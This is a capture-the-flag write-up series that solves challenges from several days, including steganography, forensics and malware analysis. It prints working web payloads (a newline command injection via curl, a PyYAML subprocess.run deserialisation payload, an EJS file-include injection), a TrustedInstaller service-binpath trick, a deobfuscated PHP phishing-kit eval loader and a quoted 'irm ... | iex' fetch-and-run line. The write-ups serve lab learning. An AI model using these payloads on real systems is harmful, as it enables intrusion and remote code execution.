$MyOasis4 = (FonatozQZ("~%%%~~%%~%%%~%~~~%%~~~~%~%%%~~%~~%%%~%~~~~%~%%~%~%%%~~%%~%%~%%~~~%%~~%~%~%%~~%~%~%%%~~~~~~%~~~~~~~%%~~%~~~%%~~%%~~~~%~%~~~%~~~%%~~%~~~~~~%~~~%~~~%%~%~~%~%%%~~%%~%%~~~~%~%%~~~%~~%%~%%~~~%%~~%~%~~%~~~~~~%~%~~%%~%%~~~%%~%%%~~%~~%%~%~~%~%%%~[...truncated...]".Replace('~', '0').Replace('%', '1')))

Just as with the byte array earlier, the contents of the MyOasis4 variable can be written to a separate file for further analysis.

$MyOasis4 | Out-File MyOasis4

The result is another PowerShell script. This script contains a commented line that includes an HTML encoded string. Using CyberChef again to decode the data, the second flag is revealed.

# $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('flag{b313794dcef335da6206d54af81b6203}'))")

flag{b313794dcef335da6206d54af81b6203}

MEMEMAN

Once again, returning to the spaghetti PowerShell script, there is a second, long string encoded in the same manner as MyOasis4.

$TDefo = (FonatozQZ("~%~~~~~%~%%~~%~~~%%~~%~~~~%~%%~%~%~~%%~%~%%%~~~~~%~%~~~~~%%%~~%~~%%~~%~%~%%~~%%~~%%~~%~%~%%%~~%~~%%~~%~%~%%~%%%~~%%~~~%%~%%~~%~%~~%~~~~~~~%~%%~%~%~~~%~%~%%%%~~~~%%~~~%%~%%~%%~~~%%%~%~%~%%%~~%%~%%~%~~%~%%~%%%%~%%~%%%~~%~~~%~%~%%%%~~~~%%%~[...truncated...]".Replace('~', '0').Replace('%', '1')))

$TDefo | Out-File TDefo

The result is yet another PowerShell script, which contains the following lines near the top of the script. The first line references MEMEMAN which was hinted at in the challenge prompt. The second line contains the final flag.

Add-MpPreference -ExclusionPath  C:\ProgramData\MEMEMAN\
# Add-MpPreference -ExclusionExtension "flag{60814731f508781b9a5f8636c817af9d}"

flag{60814731f508781b9a5f8636c817af9d}

Day 03

Maximum Sound

Challenge Prompt

Dang, this track really hits the target! It sure does get loud though, headphone users be warned!!

📄maximum_sound.wav - 9.82 MB

Solution

After listening to the audio file and analyzing the spectrogram using Audacity, there seems to be a very narrow range of frequencies in use. Additionally, the beginning of the audio is distinctly different from that of the rest of the file, featuring a long leader tone at 1900 Hz, and several shorter tones in the range of 1100 Hz and 1300 Hz. The majority of the audio continually shifts between 1500 Hz and 2300 Hz. These are all characteristics of slow scan television (SSTV).

Using an online SSTV decoder reveals the following image.

The image appears to contains a QR-like barcode. After reviewing the barcode page on Wikipedia, this appears to be a MaxiCode, which was developed by UPS for tracking packages.

Using an online barcode reader to scan the code, reveals the flag.

flag{d60ea9faec46c2de1c72533ae3ad11d7}

Day 04

ARIKA

Challenge Prompt

The Arika ransomware group likes to look slick and spiffy with their cool green-on-black terminal style website… but it sounds like they are worried about some security concerns of their own!

🖥️ ARIKA - 10.1.198.80

NOTE

The password for the ZIP archive below is arika.

📄arika.zip - 6.94 KB

Solution

Navigating to the webpage for the challenge reveals the following prompt.

This page allows commands to be entered, which are sent back to the server via an HTTP POST request. In the JavaScript snippet below, the user entered command is stored in the line variable. All new lines are removed from the entered command. This an important detail that will come into play later.

editSpan.addEventListener("keydown", (e) => {
  if (e.key === "Enter") {
    e.preventDefault();
    const raw = editSpan.textContent || "";
    const line = raw.replace(/\r?\n/g, "");

    pre.textContent = window.PROMPT + line;

    runCommand(line);
  } else if (e.key === "Tab") {

    e.preventDefault();
    insertAtCaret(editSpan, "  ");
  }
});

function runCommand(line) {
  if (line.trim() === "") {

    appendLine("");
    createPromptLine();
    return;
  }

  fetch("/", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ command: line })
  })
    .then(r => r.json())
    .then(({ ok, stdout, stderr, code, clear }) => {
      if (clear) {
        screen.innerHTML = "";
        createPromptLine();
        return;
      }
      appendBlocks(stdout || "", stderr || "");
      if (!ok && code !== 0 && !(stderr && stderr.length)) {
        appendLine(`(exit ${code})`);
      }

      createPromptLine();
    })
    .catch(err => {
      appendLine("");
      appendLine(`Client error: ${err}`);
      createPromptLine();
    });
}

The source code is provided as part of the challenge. The server is written in Python and uses Flask. POST requests are handled by the exec_command function, which checks if the submitted command is in the allow list. It does this using a regular expression that only checks if the provided command begins with a valid command name. If all checks pass, the run function is called, and the submitted command is executed in a new shell. The result of the executed command is returned in the HTTP response.

import os, re
import subprocess
from flask import Flask, render_template, request, jsonify

app = Flask(__name__)

ALLOWLIST = ["leaks", "news", "contact", "help",
             "whoami", "date", "hostname", "clear"]

def run(cmd):
    try:
        proc = subprocess.run(["/bin/sh", "-c", cmd],capture_output=True,text=True,check=False)
        return proc.stdout, proc.stderr, proc.returncode
    except Exception as e:
        return "", f"error: {e}\n", 1

@app.get("/")
def index():
    return render_template("index.html")

@app.post("/")
def exec_command():
    data = request.get_json(silent=True) or {}
    command = data.get("command") or ""
    command = command.strip()
    if not command:
        return jsonify(ok=True, stdout="", stderr="", code=0)
    if command == "clear":
        return jsonify(ok=True, stdout="", stderr="", code=0, clear=True)
    if not any([ re.match(r"^%s$" % allowed, command, len(ALLOWLIST)) for allowed in ALLOWLIST]):
        return jsonify(ok=False, stdout="", stderr="error: Run 'help' to see valid commands.\n", code=2)
    
    stdout, stderr, code = run(command)
    return jsonify(ok=(code == 0), stdout=stdout, stderr=stderr, code=code)

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=int(os.getenv("PORT", 5000)), debug=False)

Because the server only checks the beginning of the provided command against the allow list, any additional commands may be provided after that, separated by \n. In some command execution scenarios, commands may be separated using a shell operator such as &&. In this case, however, subprocess.run is not called with shell=True, so these operators are not evaluated.

As previously mentioned, the client JavaScript removes all \n characters from the command before submitting it to the server. To overcome this, the crafted HTTP request can be sent directly using curl.

curl 'http://10.1.198.80/' \
  -X POST \
  -H 'Content-Type: application/json' \
  -d '{"command":"date\ncat /app/flag.txt"}'

The response contains the result of both commands, which includes the flag.

{"code":0,"ok":true,"stderr":"","stdout":"Fri Oct 31 16:06:51 UTC 2025\nflag{eaec346846596f7976da7e1adb1f326d}\n"}

flag{eaec346846596f7976da7e1adb1f326d}

Snooze

Challenge Prompt

Don’t bug me, I’m sleeping! Zzzz… zzz… zzzz….

Uncover the flag from the file presented.

📄snooze - 45 B

Solution

Checking the file type using the file command returns the following.

snooze: compress'd data 16 bits

A quick Google search suggests this file type typically has a .z extension, which was hinted at in the challenge prompt.

Using uncompress to uncompress the file reveals the flag.

uncompress -c snooze

flag{c1c07c90efa59876a97c44c2b175903e}

Day 05

Sigma Linter

Challenge Prompt

Oh wow, another web app interface for command-line tools that already exist!

This one seems a little busted, though…

🖥️ Sigma Linter - 10.1.172.107

Solution

Navigating to the webpage for the challenge reveals a Sigma rule editor and linter with several example rules.

Clicking the Lint Rule button submits the YAML content to the server in a POST request to /lint.

Linting the registry_modification.yml example results in the following error message.

YAML Error

YAML parsing error: mapping values are not allowed here in "<unicode string>", line 7, column 17: TargetObject: '*\Run\*' ^

A quick search for this error message suggests the server is parsing the YAML content using PyYAML. The tutorial section of the documentation contains the following warning.

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.

Assuming the unsafe yaml.load function is used, Python tags, such as !!python/object/apply, may allow for command execution.

Submitting the following crafted payload should result in cat flag.txt being executed. With capture_output and text set to true, the result should be captured and returned.

title: Basic Process Creation
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image: !!python/object/apply:subprocess.run
      args: [['cat', 'flag.txt']]
      kwds:
        capture_output: true
        text: true
  condition: selection
level: low

Attempting to lint the above payload results in the following error message, which includes the flag.

Invalid

{'Image': CompletedProcess(args=['cat', 'flag.txt'], returncode=0, stdout='flag{b692115306c8e5c54a2c8908371a4c72}\n', stderr='')} is not valid under any of the given schemas

Additionally, the formatted Sigma rule also includes the flag.

title: Basic Process Creation
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image: !!python/object:subprocess.CompletedProcess
      args:
      - cat
      - flag.txt
      returncode: 0
      stdout: 'flag{b692115306c8e5c54a2c8908371a4c72}

        '
      stderr: ''
  condition: selection
level: low

flag{b692115306c8e5c54a2c8908371a4c72}

Day 06

Emotional

Challenge Prompt

Don’t be shy, show your emotions! Get emotional if you have to! Uncover the flag.

🖥️ Emotional - 10.1.37.155

📄emotional.zip - 4.21 KB

Solution

Navigating to the webpage for the challenge reveals a page to select and update the current emoji.

Selecting an emoji and clicking the Update Emotion button sends a POST request to /setEmoji containing the selection.

Reviewing the provided source code, the server uses the EJS templating language. When rendering the page, the server replaces <% profileEmoji %> in the template with the user provided input.

const profilePage = data.replace(/<% profileEmoji %>/g, profile.emoji);
const renderedHtml = ejs.render(profilePage, { profileEmoji: profile.emoji });
res.send(renderedHtml);

Because the server does not perform any validation on the user provided input, an include template tag may be submitted instead of an emoji. When the page is rendered, the contents of the included file will be displayed. Based on the directory structure of the provided source code, the payload below should include the flag in the response.

<%- include('/emoji_profile/flag.txt'); %>

After URL encoding the payload and submitting the POST request using curl, subsequent GET requests to / include the flag.

curl 'http://10.1.37.155/setEmoji' \
  -X POST \
  -d "emoji=%3C%25-%20include('/emoji_profile/flag.txt');%20%25%3E"

curl -s 'http://10.1.37.155/' | grep -oE "flag\{[a-z0-9]{32}\}"

flag{8c8e0e59d1292298b64c625b401e8cfa}

Day 07

Trust Me

Challenge Prompt

C’mon bro, trust me! Just trust me!! Trust me bro!!!

The TrustMe.exe program on this Windows desktop “doesn’t trust me?”

It says it will give me the flag, but only if I “have the permissions of Trusted Installer”…?

If you are using the VPN, you can RDP to this challenge with:

Username: Administrator
Password: h$4#82PSK0BUBaf7

NOTE

This virtual machine does not have Internet access.

🖥️ Trust Me - 10.1.81.74

Solution

Executing TrustMe.exe displays the following access denied message.

Using the “quick and dirty” approach described by James Forshaw in his blog post about becoming TrustedInstaller, this method works to execute TurstMe.exe as TrustedInstaller, however, since it is a GUI application, the dialog box is not displayed, and the flag cannot be obtained.

sc.exe config TrustedInstaller binpath= "C:\Users\Administrator\Desktop\TrustMe.exe"; sc.exe start TrustedInstaller

Using Task Manager, a dump file of the process can be created by right-clicking and selecting Create dump file. This will automatically save the dump file to the temp directory.

Using PowerShell to search the dump file, the flag is revealed.

Select-String -Path C:\Users\Administrator\AppData\Local\Temp\2\TrustMe.DMP -Pattern 'flag\{[a-z0-9]{32}\}'

flag{c6065b1f12395d526595e62cf1f4d82a}

Day 09

Tabby’s Date

Challenge Prompt

Ohhhh, Tab, Tab, Tab…. what has she done.

My friend Tabby just got a new laptop and she’s been using it to take notes. She says she puts her whole life on there!

She was so excited to finally have a date with a boy she liked, but she completely forgot the details of where and when. She told me she remembers writing it in a note… but she doesn’t think she saved it!!

She shared with us an export of her laptop files.

📄tabbys_date.zip - 39.8 KB

NOTE

The password to the ZIP archive is tabbys_date.

Can you help us find the details of Tab’s date?

Solution

The provided zip file contains a Windows directory structure, with the only files of interest contained in C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe. The TabState directory contains files associated with the currently open tabs in Windows 11 Notepad. These files include information about if and where each file is saved, as well as what data the file contains.

C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe
└── LocalState
    └── TabState
        ├── 002d2531-9aff-42b1-b54d-b178c88063b4.bin
        ├── 04165ca3-c82b-42ca-ab07-0c774ae66efd.bin
        ├── 056941ef-d51d-4e57-9a55-b59d58bf3fcb.bin
        ├── 14623d59-ad8c-43a8-b669-587f049a1516.bin
        ├── 17de440f-3f69-4d8a-94fe-f3d4b9cf0c3f.bin
        ├── 1aebb59c-5d51-41f1-918e-dec9e1a28ce1.bin
        ├── 2d755c27-5840-47ad-a4ca-ed8041dd3047.bin
        ├── 2e0dd6b6-ba93-4efc-9fd4-985dad74869a.bin
        ├── 414e4071-60e6-4bb6-9a5a-f1e5bf6fe79c.bin
        ├── 45dcdbe4-26b5-4e0b-ba2d-29e9e9c1e11b.bin
        ├── 4f1c96a1-960c-4cee-9751-fe4b4f59fdd0.bin
        ├── 5a57ac85-7e99-4bfc-9e13-f0d28a2bcc20.bin
        ├── 66f955a8-6994-47c6-8326-0f128dafd0b9.bin
        ├── 68d7e607-77c4-4d35-8ef2-0170a84efe5f.bin
        ├── 68fefe2f-a7a6-4afa-b383-7fdc142aadde.bin
        ├── 711f26f1-0eff-4a34-a78c-03562e44a36b.bin
        ├── 7458196e-e979-4d94-982a-246fca3db028.bin
        ├── 7ba066a2-e0cb-4c06-9339-316411a3da27.bin
        ├── 9925cc8a-6440-4128-acae-f31541130a5e.bin
        ├── 9bf7ca49-e491-4691-a21a-f3263bb695a2.bin
        ├── 9e96bd4b-4155-4558-b97a-edcdf01d4584.bin
        ├── a16d5079-b2f7-4a54-b3d5-b32256c4f238.bin
        ├── a2048a5f-5cb5-460d-8ce6-70899de24d9c.bin
        ├── a9da0602-fcd2-4793-9bab-70276e881006.bin
        ├── af1fbc46-41cb-4d4b-9c34-02b874bfe9c6.bin
        ├── b5074fe7-4f54-4728-afe9-1c063d211a82.bin
        ├── b5154796-9d23-43ce-8a6c-c373e63f22c0.bin
        ├── bcd5d203-1523-4b86-a572-c1c3afded478.bin
        ├── c3cbe154-ef26-4e93-9183-c7fd323fe8c0.bin
        ├── c4b77218-ef21-4a7f-9814-e4444f82475a.bin
        ├── cb2f0c84-6293-4e63-8575-78dc879945e0.bin
        ├── cd01dd8e-32f6-4f88-b9bb-4009afca3fea.bin
        ├── dcfa4d00-41c8-439a-b1bd-2706dd8dbe0d.bin
        ├── dea21c9d-4534-4d38-a60b-0a5c1b9b5928.bin
        ├── e21dc9ae-2a03-42bf-8972-35ce8d524695.bin
        ├── e6a849ab-6f02-452c-98e7-cdb03c577818.bin
        ├── e86c9910-afca-4e83-87f6-600ed08a0570.bin
        ├── ed9b5775-f35a-4770-a35e-e3c24b8bed47.bin
        └── f1473e57-7637-4bd0-8158-53715ea20630.bin

After manually reviewing several files using xxd, the flag is found in 2e0dd6b6-ba93-4efc-9fd4-985dad74869a.bin

xxd C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe/LocalState/TabState/2e0dd6b6-ba93-4efc-9fd4-985dad74869a.bin

00000000: 4e50 0000 0100 0001 0000 0301 0101 0000  NP..............
00000010: 8120 48e2 0000 ba03 3dd8 96dc 3dd8 96dc  . H.....=...=...
00000020: 2000 4400 6100 7400 6500 2000 7700 6900   .D.a.t.e. .w.i.
00000030: 7400 6800 2000 4500 7200 6900 6300 2100  t.h. .E.r.i.c.!.
00000040: 2100 2100 2000 3dd8 96dc 3dd8 96dc 0d00  !.!. .=...=.....
00000050: 0d00 6f00 6d00 6700 6700 6700 6700 6700  ..o.m.g.g.g.g.g.
00000060: 2000 6900 2700 6d00 2000 7300 6f00 6f00   .i.'.m. .s.o.o.
00000070: 6f00 2000 6500 7800 6300 6900 7400 6500  o. .e.x.c.i.t.e.
00000080: 6400 2000 3dd8 0dde 0d00 6800 6500 2000  d. .=.....h.e. .
00000090: 6100 6300 7400 7500 6100 6c00 6c00 7900  a.c.t.u.a.l.l.y.
000000a0: 2000 6100 7300 6b00 6500 6400 2000 6d00   .a.s.k.e.d. .m.
000000b0: 6500 2000 6f00 7500 7400 2100 2100 2100  e. .o.u.t.!.!.!.
000000c0: 2000 6900 2000 6300 6100 6e00 2700 7400   .i. .c.a.n.'.t.
000000d0: 2000 6200 6500 6c00 6900 6500 7600 6500   .b.e.l.i.e.v.e.
000000e0: 2000 6900 7400 0d00 0d00 4400 6500 7400   .i.t.....D.e.t.
000000f0: 6100 6900 6c00 7300 2000 7300 6f00 2000  a.i.l.s. .s.o. .
00000100: 6900 2000 6400 6f00 6e00 1920 7400 2000  i. .d.o.n.. t. .
00000110: 6600 6f00 7200 6700 6500 7400 3a00 0d00  f.o.r.g.e.t.:...
00000120: 2d00 2000 7700 6800 6500 6e00 3a00 2000  -. .w.h.e.n.:. .
00000130: 7300 6100 7400 7500 7200 6400 6100 7900  s.a.t.u.r.d.a.y.
00000140: 2c00 2000 7300 6500 7000 7400 2000 3100  ,. .s.e.p.t. .1.
00000150: 3400 7400 6800 2c00 2000 3700 3a00 3000  4.t.h.,. .7.:.0.
00000160: 3000 7000 6d00 0d00 2d00 2000 7700 6800  0.p.m...-. .w.h.
00000170: 6500 7200 6500 3a00 2000 5300 7400 6100  e.r.e.:. .S.t.a.
00000180: 7200 6200 7500 6300 6b00 7300 2000 6f00  r.b.u.c.k.s. .o.
00000190: 6e00 2000 4d00 6100 6900 6e00 2000 5300  n. .M.a.i.n. .S.
000001a0: 7400 7200 6500 6500 7400 2000 1526 0d00  t.r.e.e.t. ..&..
000001b0: 2d00 2000 6100 6600 7400 6500 7200 2000  -. .a.f.t.e.r. .
000001c0: 6d00 6100 7900 6200 6500 2000 6d00 6f00  m.a.y.b.e. .m.o.
000001d0: 7600 6900 6500 2000 6100 7400 2000 7400  v.i.e. .a.t. .t.
000001e0: 6800 6500 2000 7000 6c00 6100 7a00 6100  h.e. .p.l.a.z.a.
000001f0: 2000 3cd8 acdf 0d00 0d00 6200 7400 7700   .<.......b.t.w.
00000200: 2000 7400 6800 6500 2000 7700 6900 6600   .t.h.e. .w.i.f.
00000210: 6900 2000 6100 7400 2000 7400 6800 6100  i. .a.t. .t.h.a.
00000220: 7400 2000 7300 7400 6100 7200 6200 7500  t. .s.t.a.r.b.u.
00000230: 6300 6b00 7300 2000 6900 7300 2000 7300  c.k.s. .i.s. .s.
00000240: 6f00 6f00 6f00 6f00 2000 7700 6500 6900  o.o.o.o. .w.e.i.
00000250: 7200 6400 2c00 0d00 7400 6800 6500 7900  r.d.,...t.h.e.y.
00000260: 2000 7400 6f00 6c00 6400 2000 6d00 6500   .t.o.l.d. .m.e.
00000270: 2000 7400 6800 6500 2000 7000 6100 7300   .t.h.e. .p.a.s.
00000280: 7300 7700 6f00 7200 6400 2000 6900 7300  s.w.o.r.d. .i.s.
00000290: 3a00 2000 6600 6c00 6100 6700 7b00 3100  :. .f.l.a.g.{.1.
000002a0: 3600 3500 6400 3100 3900 6200 3600 3100  6.5.d.1.9.b.6.1.
000002b0: 3000 6300 3000 3200 6200 3200 3800 3300  0.c.0.2.b.2.8.3.
000002c0: 6600 6300 3100 6100 3600 6200 3400 6100  f.c.1.a.6.b.4.a.
000002d0: 3500 3400 6300 3400 6100 3500 3800 7d00  5.4.c.4.a.5.8.}.
000002e0: 0d00 0d00 6800 6500 1920 7300 2000 7300  ....h.e.. s. .s.
000002f0: 6f00 6f00 6f00 2000 6300 7500 7400 6500  o.o.o. .c.u.t.e.
00000300: 2100 2100 2100 2000 6900 2000 7700 7200  !.!.!. .i. .w.r.
00000310: 6f00 7400 6500 2000 6900 7400 2000 6100  o.t.e. .i.t. .a.
00000320: 6c00 6c00 2000 6400 6f00 7700 6e00 2000  l.l. .d.o.w.n. .
00000330: 6a00 7500 7300 7400 2000 6900 6e00 2000  j.u.s.t. .i.n. .
00000340: 6300 6100 7300 6500 2000 6900 2000 6600  c.a.s.e. .i. .f.
00000350: 6f00 7200 6700 6500 7400 2000 6c00 6f00  o.r.g.e.t. .l.o.
00000360: 6c00 0d00 6300 6100 6e00 1920 7400 2000  l...c.a.n.. t. .
00000370: 7700 6100 6900 7400 2100 2100 2000 3dd8  w.a.i.t.!.!. .=.
00000380: 95dc 3dd8 95dc 3dd8 95dc 0d00 c357 03ed  ..=...=......W..

Alternatively, with the encoding set to 16-bit big endian, strings can be used to search all of the files for the flag.

strings -e b C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe/LocalState/TabState/* | grep -i flag

flag{165d19b610c02b283fc1a6b4a54c4a58}

Day 10

For Greatness

Challenge Prompt

Oh great, another phishing kit. This has some functionality to even send stolen data over email! Can you track down the email address they send things to?

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

The password to the archive is infected. Uncover the flag from the file provided.

📄for_greatness.zip - 130 KB

Solution

The provided zip file contains an obfuscated PHP file, j.php. The original file is primarily written on a single line. Using the semicolons as a separator, the formatting can be cleaned up to make the file more readable. The script uses a series of goto operators and randomly named target labels and variables to jumble things, making it more difficult to read. Additionally, the strings appear to be a mix of octal and hexadecimal encoded characters.

<?php
goto oxiT1;
KC3di: $sl5eq = $lFKwz($sl5eq);
goto m4J3j;
zEIti: $GGMnR = $sl5eq();
goto g0hmD;
m4J3j: $VhLHm = $lFKwz($VhLHm);
goto NmVIQ;
g0hmD: $AQTh0();
goto FkkRP;
C9ufu: $d8Mzs($fPdlo($lFKwz($FRczk)));
goto zEIti;
yLDSn: $VhLHm = "\x20\40\142\x32\112\x66\x63\x33\x52\x68\x63\156\121\x3d";
goto vZvXQ;
vZvXQ: $sl5eq = "\x62\62\x4a\146\132\x32\126\60\130\62\116\x76\142\156\122\x6c\142\156\x52\x7a";
goto lo0I_;
ddvsq: $fPdlo = $lFKwz($fPdlo);
goto CcPTn;
G3Rr2: $VhLHm();
goto C9ufu;
a4yHD: $fPdlo = "\40\x5a\63\160\x31\x62\x6d\116\x76\x62\x58\x42\x79\132\x58\x4e\172";
goto yLDSn;
zFUky: $OovTE = $lFKwz($OovTE);
goto Cciv0;
fDcHz: $AQTh0 = $lFKwz($AQTh0);
goto KC3di;
Cciv0: $d8Mzs = $iQPa4("\44\137", $OovTE);
goto fDcHz;
CMzN3: $iQPa4 = "\130\x31\71\x73\x59\127\x31\151\132\x47\x45\x3d";
goto a4yHD;
CcPTn: if (!function_exists("\137\x5f\154\x61\x6d\x62\x64\141")) {
  function __lambda($sZ_lH, $AP_tK) {
    return eval("\x72\x65\164\165\x72\x6e\40\146\x75\156\143\x74\x69\157\156\x28{$sZ_lH}\51\x7b{$AP_tK}\x7d\x3b");
  }
}
goto oSLxJ;
NmVIQ: $FRczk = "\145\112\172\164\57\126\154\172\64\164\162\127\71\167\166\145\156\60\71\122\106\170\130\170\126\163\127\165\161\101\145\102\171\132\63\105\151\130\116\150\104\115\112\147\111\171\143\103\151\145"; // Truncated
goto G3Rr2;
HV0Iz: $AQTh0 = "\40\40\x20\x20\x62\x32\x4a\x66\x5a\127\x35\x6b\130\x32\116\163\132\127\x46\165";
goto IXsP0;
lo0I_: $lFKwz = "\x62\x61\163\145\x36\64\x5f\144\145\143\157\144\x65";
goto ddvsq;
oSLxJ: $iQPa4 = $lFKwz($iQPa4);
goto zFUky;
cdhu8: $FRczk = "\114\x6f\141\144\151\x6e\147\40\103\154\141\x73\163\57\x43\157\x64\145\x20\x4e\x41\x4d\105";
goto HV0Iz;
IXsP0: $OovTE = "\x63\x6d\x56\x30\144\x58\112\x75\111\107\x56\62\x59\127\167\157\x4a\106\70\160\x4f\167\75\75";
goto CMzN3;
oxiT1: $lFKwz = "\x70\x72\151\156\x74\x66";
goto cdhu8;
FkkRP: echo $GGMnR;

After restructuring the script by following the goto operators and decoding the strings, the following is the result. Several of the decoded strings are base64 encoded.

<?php
$lFKwz = "printf";
$FRczk = "Loading Class/Code NAME";
$AQTh0 = "    b2JfZW5kX2NsZWFu";
$OovTE = "cmV0dXJuIGV2YWwoJF8pOw==" ;
$iQPa4 = "X19sYW1iZGE=";
$fPdlo = " Z3p1bmNvbXByZXNz";
$VhLHm = "  b2Jfc3RhcnQ=";
$sl5eq = "b2JfZ2V0X2NvbnRlbnRz";
$lFKwz = "base64_decode" ;
$fPdlo = $lFKwz($fPdlo);
if (!function_exists("__lambda")) {
  function __lambda($sZ_lH, $AP_tK) {
    return eval("return function(" . $sZ_lH . "){" . $AP_tK . "};");
  }
}
$iQPa4 = $lFKwz($iQPa4);
$OovTE = $lFKwz($OovTE);
$d8Mzs = $iQPa4('$_', $OovTE);
$AQTh0 = $lFKwz($AQTh0);
$sl5eq = $lFKwz($sl5eq);
$VhLHm = $lFKwz($VhLHm);
$FRczk = "\145\112\172\164\57\126\154\172\64\164\162\127\71\167\166\145\156\60\71\122\106\170\130\170\126\163\127\165\161\101\145\102\171\132\63\105\151\130\116\150\104\115\112\147\111\171\143\103\151\145"; // Truncated
$VhLHm();
$d8Mzs($fPdlo($lFKwz($FRczk)));
$GGMnR = $sl5eq();
$AQTh0();
echo $GGMnR;

The FRczk variable contains a long, octal encoded payload. After decoding several of the base64 encoded strings, it appears the payload is effectively base64 decoded, uncompressed, and executed.

eval(gzuncompress(base64_decode($FRczk)));

Using CyberChef to reverse this process and clean up the result, there is another large base64 encoded payload stored in the $___________ variable.

$____ = 'printf';
$___________ = 'Class/Code NAME Class...';
$___ = 'X19sYW1iZGE=';
$______ = 'cmV0dXJuIGV2YWwoJF9fXyk7';
$____ = 'base64_decode';
$___________ = 'CkBzZXNzaW9uX3N0YXJ0KCk7CmhlYWRlcignQWNjZXNzLUNvbnRyb2wtQWxsb3ct...'; // Truncated
$______ = $____($______);
$___ = $____($___);
$_____ = $___('$___', $______);
$_____($____($___________));

The decoded result of the second payload contains a large amount of PHP and HTML. The challenge prompt suggests looking for an email address. After searching through the PHP, the flag appears to be included in the From address in the disp::mailTo function.

class disp {
	...omitted...

	public function mailTo($add,$cont){
		$subject='++++Office Email From Greatness+++++';
		$headers='Content-type: text/html; charset=UTF-8' . "\r\nFrom: Greatness <ghost+}f7113307018770d52d4f94fec013197f{[email protected]>" . "\r\n";
		@mail($add,$subject,$cont,$headers);
	}

	...omitted...
}

Reversing email address reveals the flag.

flag{f791310cef49f4d25d0778107033117f}

Day 20

Darcy

Challenge Prompt

Darcy has apparently been having a lot of fun with a unique version control system.

She told me she hid a flag somewhere with her new tool and wants me to find it… I can’t make any sense of it, can you?

📄darcy.tar.gz - 7.61 MB

Solution

The provided tar.gz file contains a Darcs repository. The repository contains a large number of patches, which are similar to commits in a Git repository. All patches can be listed using the log command. This presents information about each patch, including the author, date and time, and comment.

darcs log

Since this repository contains many patches, the log command displays the results using less. The results can be searched using the / command. Searching for the term flag finds the patch below.

patch b7b8767c2e09faf049a37d74315325f34e9d0fd8
Author: [email protected]
Date:   Tue Sep 30 02:18:27 EDT 2025
  * routine update; details: flag{a0c1e852e1281d134f0ac2b8615183a3}

flag{a0c1e852e1281d134f0ac2b8615183a3}

Day 21

Follow The Money

Challenge Prompt

Hey Support Team,

We had a bit of an issue yesterday that I need you to look into ASAP. There’s been a possible case of money fraud involving our client, Harbor Line Bank. They handle a lot of transfers for real estate down payments, but the most recent one doesn’t appear to have gone through correctly.

Here’s the deal, we need to figure out what happened and where the money might have gone. The titling company is looping in their incident response firm to investigate from their end. I need you to quietly review things on our end and see what you can find. Keep it discreet and be passive.

I let Evelyn over at Harbor Line know that someone from our team might reach out. Her main email is offline right now just in case it was compromised, she’s using a temporary address until things get sorted out:

[email protected]

IMPORTANT

This challenge uses a non-standard flag format.

NOTE

The password to the ZIP archive below is follow_the_money.

📄follow_the_money.zip - 207 KB

Solution

The provided zip file contains five emails which appear to be between Evelyn Carter ([email protected]) and Justin Case ([email protected]). The first four emails appear to be legitimate. Justin directs their partners to make transfers using the link in his email signature, https://evergatetitle.netlify.app/. In the fifth email, the sender purports the payment has not been received, and requests that Evelyn resend the payment using the link in the signature, https://evergatetltle.netlify.app/. This URL differs by a single character from those received in previous communications from Justin.

After reviewing the markup of the impersonated site, https://evergatetltle.netlify.app/, the following message is found, which contains a base64 encoded string.

<div id="transferThankYouModal" class="fixed inset-0 w-full h-full flex items-center justify-center modal-overlay hidden z-50">
  <div class="bg-white rounded-lg shadow-2xl p-8 w-full max-w-2xl m-4 text-center">
    <h2 class="text-3xl font-bold text-gray-800 mb-4">Details Submitted</h2>
    <p class="text-lg text-gray-600">Thanks for giving me your bank! Your friend,
      aHR0cHM6Ly9uMHRydXN0eC1ibG9nLm5ldGxpZnkuYXBwLw==
      Retrieval ID: 471082</p>
    <button id="closeTransferThankYou" class="mt-6 bg-gray-700 text-white font-bold py-2 px-6 rounded-lg hover:bg-gray-600 transition">Close</button>
  </div>
</div>

Decoding the base64 string from this message reveals a URL: https://n0trustx-blog.netlify.app/.

The footer of this page contains a link to a GitHub profile that contains a single repository: https://github.com/N0TrustX/Spectre. The repository contains a README.md file that says to open spectre.html in the browser and submit the “Retrieval ID”. The ID 471082 was found along side the base64 encoded URL.

Reviewing spectre.html, the following base64 encoded payload is quickly found.

<!-- The Base64 encoded object is stored here, hidden from view -->
<div id="encodedPayload" class="hidden">ZmxhZ3trbDF6a2xqaTJkeWNxZWRqNmVmNnltbHJzZjE4MGQwZn0=</div>

Decoding the base64 encoded string reveals the flag.

flag{kl1zklji2dycqedj6ef6ymlrsf180d0f}

Day 24

Lizard

Challenge Prompt

Erm, what the sigma?

We saw this strange PowerShell string on one of our hosts, can you investigate and figure out what this does?

irm biglizardlover.com/gecko | iex

CAUTION

This is the Malware category, and as such, includes malware.

Please be sure to analyze these files within an isolated virtual machine.

Solution

The challenge prompt provides the following PowerShell string. irm is an alias for Invoke-RestMethod, which will make an HTTP GET request to the specified URL. iex is an alias for Invoke-Expression, which will execute the script fetched from the URL.

irm biglizardlover.com/gecko | iex

The script returned by this URL is included below. The initial part of this script evaluates to iex. The second part of this script is an obfuscated script that is passed as an argument to iex. The script is XORed using the key 0x2c.

